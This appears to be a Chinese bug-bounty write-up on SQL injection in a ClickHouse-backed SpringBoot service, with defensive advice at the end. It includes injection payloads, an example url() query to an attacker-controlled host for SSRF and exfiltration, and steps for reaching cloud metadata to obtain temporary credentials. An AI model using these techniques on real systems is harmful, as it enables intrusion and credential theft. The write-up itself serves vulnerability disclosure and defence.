ClickHouse数据库SQL注入漏洞挖掘与分析<\/h1>

1. 漏洞发现背景<\/h2>
在SRC挖掘过程中，发现一个使用ClickHouse数据库的系统存在SQL注入漏洞。ClickHouse是一种开源的列式数据库管理系统(DBMS)，主要用于在线分析处理(OLAP)。与传统的关系型数据库如MySQL不同，ClickHouse在语法和功能上有其特殊性。<\/p>

2. 初始发现过程<\/h2>

2.1 目标识别<\/h3>

目标系统是一个前后端分离的网站，基于SpringBoot框架<\/li>
发现存在\/env<\/code>端点泄露，但无敏感信息<\/li>

发现Swagger UI界面，尝试测试接口<\/li>
<\/ul>
2.2 漏洞触发点<\/h3>

测试接口时发现数据库报错信息<\/li>
报错信息显示系统使用ClickHouse数据库<\/li>
错误出现在参数处理过程中，表明存在SQL注入可能<\/li>
<\/ul>
3. ClickHouse数据库特性<\/h2>
3.1 基本特点<\/h3>

列式存储数据库，适合大数据分析<\/li>
语法与传统SQL有差异<\/li>
系统自带数据库和表，如system.tables<\/code><\/li>
<\/ul>
3.2 与MySQL的主要区别<\/h3>

表名格式通常为database.table<\/code><\/li>
注释语法需要分号：;--<\/code><\/li>
特有的函数如url()<\/code>可用于外部请求<\/li>
<\/ul>
4. 漏洞分析<\/h2>
4.1 原始SQL语句重构<\/h3>
通过报错信息，重构出原始SQL语句大致如下：<\/p>
SELECT<\/span> *<\/span> from<\/span> apaaslog.tmp 
<\/span><\/span>WHERE<\/span> 1<\/span> =<\/span> 1<\/span> 
<\/span><\/span>AND<\/span> appid =<\/span> '1'<\/span> 
<\/span><\/span>AND<\/span> tenantname !=<\/span> ''<\/span> 
<\/span><\/span>AND<\/span> receive_date IN<\/span> (today(), yesterday()) 
<\/span><\/span>ORDER<\/span> BY<\/span> tenantname ASC<\/span>
<\/span><\/span><\/code><\/pre>4.2 注入点确认<\/h3>

参数logstore<\/code>存在注入可能<\/li>
输入\/tmp\/log<\/code>触发报错<\/li>
发现系统对输入进行了特殊处理：删除第一个\/<\/code>后，tmp\/log<\/code>变为\/log<\/code><\/li>
<\/ul>
4.3 注入技术细节<\/h3>


表名爆破<\/strong>：<\/p>

发现系统将点号.<\/code>前的部分识别为数据库名<\/li>
使用system.tables<\/code>系统表进行测试<\/li>
构造payload：$system.tables$<\/code><\/li>
<\/ul>
<\/li>

注释技术<\/strong>：<\/p>

ClickHouse中完整注释语法为;--<\/code><\/li>
使用注释绕过后续条件：... AND tenantname != '';--<\/code><\/li>
<\/ul>
<\/li>

联合查询<\/strong>：<\/p>

通过注入执行额外SQL查询<\/li>
例如查询数据库信息<\/li>
<\/ul>
<\/li>
<\/ol>
5. 漏洞利用进阶<\/h2>
5.1 URL函数利用<\/h3>
ClickHouse的url()<\/code>函数可被用于SSRF攻击：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> url('http:\/\/attacker-controlled-server.com'<\/span>, 'CSV'<\/span>, 'column1 String'<\/span>)
<\/span><\/span><\/code><\/pre>利用场景：<\/p>

探测内网服务<\/li>
获取云元数据（如腾讯云metadata）<\/li>
数据外泄<\/li>
<\/ul>
5.2 实际利用步骤<\/h3>

通过DNSLog验证SSRF可行性<\/li>
探测云元数据端点（如腾讯云的http:\/\/metadata.tencentyun.com<\/code>）<\/li>
尝试获取临时凭证<\/li>
扩大攻击范围<\/li>
<\/ol>
6. 防御建议<\/h2>
6.1 输入验证<\/h3>

对所有用户输入进行严格过滤<\/li>
使用参数化查询或预编译语句<\/li>
<\/ul>
6.2 配置加固<\/h3>

禁用敏感接口（如\/env<\/code>、Swagger UI）的生产环境访问<\/li>
限制数据库权限，避免使用高权限账户<\/li>
<\/ul>
6.3 ClickHouse特定防护<\/h3>

限制url()<\/code>函数的使用<\/li>
配置网络策略，禁止数据库发起外部请求<\/li>
定期更新ClickHouse到最新版本<\/li>
<\/ul>
7. 总结<\/h2>
本次漏洞挖掘展示了在非传统数据库中发现SQL注入的技术路径。关键点包括：<\/p>

识别数据库类型通过报错信息<\/li>
理解特定数据库的语法差异<\/li>
利用系统表和函数进行拓展攻击<\/li>
将传统SQL注入技术适配到新型数据库环境<\/li>
<\/ol>
这种类型的漏洞在数据分析类系统中尤为危险，因为这类系统通常处理大量敏感业务数据，且安全防护相对传统业务系统较弱。<\/p>